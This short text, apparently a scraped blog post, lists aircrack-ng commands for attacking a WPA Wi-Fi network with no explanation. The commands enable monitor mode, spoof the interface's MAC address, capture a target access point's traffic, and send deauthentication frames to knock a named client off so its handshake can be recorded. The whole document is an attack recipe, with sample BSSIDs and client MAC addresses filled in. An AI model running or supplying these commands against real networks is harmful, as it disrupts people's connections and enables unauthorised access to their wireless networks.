airmon-ng
airmon-ng start <interface>
ifconfig mon0 down
macchanger -s mon0
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng --encrypt WPA -a mon0
--bssid <bssid of the access point you wish to target>
-c <channel>
-w <filename>
airodump-ng --bssid 00:23:4E:55:B3:84 -c 1 -w WPA mon0
aireplay-ng --deauth 10 -a <bssid of access poin> -c <mac address of client> <interface>
aireplay-ng --deauth 10 -a 00:23:4E:55:B3:84 -c DE:03:74:C7:33:8E mon0
0 Comments